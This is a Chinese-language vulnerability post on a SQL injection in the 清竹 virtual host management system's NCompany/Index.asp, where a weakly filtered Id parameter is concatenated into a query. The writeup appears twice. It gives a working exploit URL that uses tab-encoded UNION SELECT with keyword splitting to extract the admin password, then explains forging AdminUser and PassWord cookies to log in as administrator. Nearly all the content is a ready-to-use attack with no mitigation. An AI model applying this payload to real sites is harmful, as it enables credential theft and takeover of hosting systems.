清竹虚拟主机管理系统sql注入漏洞

  • A+
所属分类:漏洞时代
摘要

清竹虚拟主机管理系统sql注入漏洞
NCompany/Index.asp
[php]
loadfile_fromcache templatePath&”NCompany-Index.html” ‘加载index.html模板
TempCon=TempCon&Application(“Qz_TP_”&templatePath&”NCompany-Index.html”)
Id=ReStrs(Request.QueryString(“Id”))//过滤不严格
Set rs=Conn.Execute(“Select * From [Qz_NComPany] Where [Id]=”&Id)//直接带入sql语句
Address=rs(“Address”)
TelInfo=rs(“TelInfo”)
[/php]
exp:
[php]ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1[/php]
构造cookie:
[php]
AdminUser = 注入得来的adminuser
PassWord = 注入得来的adminpass[/php]

清竹虚拟主机管理系统sql注入漏洞
NCompany/Index.asp
[php]
loadfile_fromcache templatePath&"NCompany-Index.html" '加载index.html模板
TempCon=TempCon&Application("Qz_TP_"&templatePath&"NCompany-Index.html")
Id=ReStrs(Request.QueryString("Id"))//过滤不严格
Set rs=Conn.Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//直接带入sql语句
Address=rs("Address")
TelInfo=rs("TelInfo")
[/php]
exp:
[php]ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1[/php]
构造cookie:
[php]
AdminUser = 注入得来的adminuser
PassWord = 注入得来的adminpass[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: